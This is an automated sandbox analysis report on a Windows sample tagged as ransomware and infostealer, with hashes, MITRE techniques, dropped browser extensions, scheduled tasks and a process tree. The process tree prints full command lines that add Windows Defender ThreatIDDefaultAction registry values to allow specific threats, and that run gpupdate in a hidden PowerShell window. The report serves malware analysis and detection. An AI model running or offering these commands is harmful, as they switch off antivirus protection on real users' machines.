caedd9efb0758b3928fb4277c5a6a27e9989c6d3d03742adfdf83242fe29cb59

Analysis

max time kernel
133s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
27-05-2024 05:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Size

6.6MB
MD5

63f5795f3090d05b9165f4788e8cd0be
SHA1

e471234ef41fc7c15ee1213fb3b04f0b4bff05ba
SHA256

caedd9efb0758b3928fb4277c5a6a27e9989c6d3d03742adfdf83242fe29cb59
SHA512

f17d886adf196a79b7226d387e50497c6fd0cf0933bb885d7e2fd5bb448d131da95eb7724484aebfcb3a70cde0d2c68b7ead007a7f743d8cb3528856bda4b99a
SSDEEP

196608:lNZIJez06oDGWsY2C7KelsLeElAFnWVlo4439VQeWx:lN6e6uPCVlsLfqFnF4IQn

Score

8^/10

discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXE

pid process

2224 powershell.exe
3368 powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\manifest.json	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Drops file in System32 directory 3 IoCs

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Drops file in Program Files directory 14 IoCs

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

description	ioc	process
File created	C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\QAsjNlw.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\lOSXAGLcobUn\LWcWDDP.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\HCtEkPSKU\xUdFVd.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\nrpbMHu.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\GiPqhqLluuCEC\YmOlTcT.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\HCtEkPSKU\AtzYPTX.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\aSRIytoBnSqU2\bxWUSdCFGVydM.dll	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\aSRIytoBnSqU2\rJopSUQ.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
File created	C:\Program Files (x86)\GiPqhqLluuCEC\VrNNevo.xml	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\kuRaZQzPzSEXqOG.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1588 4388 WerFault.exe 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

408 schtasks.exe
3956 schtasks.exe
1800 schtasks.exe
4936 schtasks.exe
1688 schtasks.exe
808 schtasks.exe
3568 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\kuRaZQzPzSEXqOG.job	schtasks.exe

pid	pid_target	process	target process
1588	4388	WerFault.exe	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

pid	process
408	schtasks.exe
3956	schtasks.exe
1800	schtasks.exe
4936	schtasks.exe
1688	schtasks.exe
808	schtasks.exe
3568	schtasks.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

pid	process
2224	powershell.exe
2224	powershell.exe
4860	powershell.exe
4860	powershell.exe
2408	powershell.exe
2408	powershell.exe
3368	powershell.EXE
3368	powershell.EXE
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	3368	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exepowershell.execmd.exe

description	pid	process	target process
PID 4388 wrote to memory of 3912	4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	cmd.exe
PID 4388 wrote to memory of 3912	4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	cmd.exe
PID 4388 wrote to memory of 3912	4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	cmd.exe
PID 3912 wrote to memory of 3956	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 3956	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 3956	3912	cmd.exe	forfiles.exe
PID 3956 wrote to memory of 2408	3956	forfiles.exe	cmd.exe
PID 3956 wrote to memory of 2408	3956	forfiles.exe	cmd.exe
PID 3956 wrote to memory of 2408	3956	forfiles.exe	cmd.exe
PID 2408 wrote to memory of 2540	2408	cmd.exe	reg.exe
PID 2408 wrote to memory of 2540	2408	cmd.exe	reg.exe
PID 2408 wrote to memory of 2540	2408	cmd.exe	reg.exe
PID 3912 wrote to memory of 4992	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 4992	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 4992	3912	cmd.exe	forfiles.exe
PID 4992 wrote to memory of 3976	4992	forfiles.exe	cmd.exe
PID 4992 wrote to memory of 3976	4992	forfiles.exe	cmd.exe
PID 4992 wrote to memory of 3976	4992	forfiles.exe	cmd.exe
PID 3976 wrote to memory of 4408	3976	cmd.exe	reg.exe
PID 3976 wrote to memory of 4408	3976	cmd.exe	reg.exe
PID 3976 wrote to memory of 4408	3976	cmd.exe	reg.exe
PID 3912 wrote to memory of 3228	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 3228	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 3228	3912	cmd.exe	forfiles.exe
PID 3228 wrote to memory of 1572	3228	forfiles.exe	cmd.exe
PID 3228 wrote to memory of 1572	3228	forfiles.exe	cmd.exe
PID 3228 wrote to memory of 1572	3228	forfiles.exe	cmd.exe
PID 1572 wrote to memory of 4456	1572	cmd.exe	reg.exe
PID 1572 wrote to memory of 4456	1572	cmd.exe	reg.exe
PID 1572 wrote to memory of 4456	1572	cmd.exe	reg.exe
PID 3912 wrote to memory of 1080	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 1080	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 1080	3912	cmd.exe	forfiles.exe
PID 1080 wrote to memory of 212	1080	forfiles.exe	cmd.exe
PID 1080 wrote to memory of 212	1080	forfiles.exe	cmd.exe
PID 1080 wrote to memory of 212	1080	forfiles.exe	cmd.exe
PID 212 wrote to memory of 1984	212	cmd.exe	reg.exe
PID 212 wrote to memory of 1984	212	cmd.exe	reg.exe
PID 212 wrote to memory of 1984	212	cmd.exe	reg.exe
PID 3912 wrote to memory of 3056	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 3056	3912	cmd.exe	forfiles.exe
PID 3912 wrote to memory of 3056	3912	cmd.exe	forfiles.exe
PID 3056 wrote to memory of 3816	3056	forfiles.exe	cmd.exe
PID 3056 wrote to memory of 3816	3056	forfiles.exe	cmd.exe
PID 3056 wrote to memory of 3816	3056	forfiles.exe	cmd.exe
PID 3816 wrote to memory of 2224	3816	cmd.exe	powershell.exe
PID 3816 wrote to memory of 2224	3816	cmd.exe	powershell.exe
PID 3816 wrote to memory of 2224	3816	cmd.exe	powershell.exe
PID 2224 wrote to memory of 3740	2224	powershell.exe	gpupdate.exe
PID 2224 wrote to memory of 3740	2224	powershell.exe	gpupdate.exe
PID 2224 wrote to memory of 3740	2224	powershell.exe	gpupdate.exe
PID 4388 wrote to memory of 4860	4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	powershell.exe
PID 4388 wrote to memory of 4860	4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	powershell.exe
PID 4388 wrote to memory of 4860	4388	2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe	powershell.exe
PID 4860 wrote to memory of 1728	4860	powershell.exe	cmd.exe
PID 4860 wrote to memory of 1728	4860	powershell.exe	cmd.exe
PID 4860 wrote to memory of 1728	4860	powershell.exe	cmd.exe
PID 1728 wrote to memory of 2412	1728	cmd.exe	reg.exe
PID 1728 wrote to memory of 2412	1728	cmd.exe	reg.exe
PID 1728 wrote to memory of 2412	1728	cmd.exe	reg.exe
PID 4860 wrote to memory of 5096	4860	powershell.exe	reg.exe
PID 4860 wrote to memory of 5096	4860	powershell.exe	reg.exe
PID 4860 wrote to memory of 5096	4860	powershell.exe	reg.exe
PID 4860 wrote to memory of 3632	4860	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
- Suspicious use of WriteProcessMemory
PID:3912

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:3956

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2408

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:2540

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:4992

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:3976

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:4408

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:3228

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:1572

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:4456

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:212

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:1984

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Suspicious use of WriteProcessMemory
PID:3056

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
- Suspicious use of WriteProcessMemory
PID:3816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2224

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:3740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5096

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3436

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:2488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3648

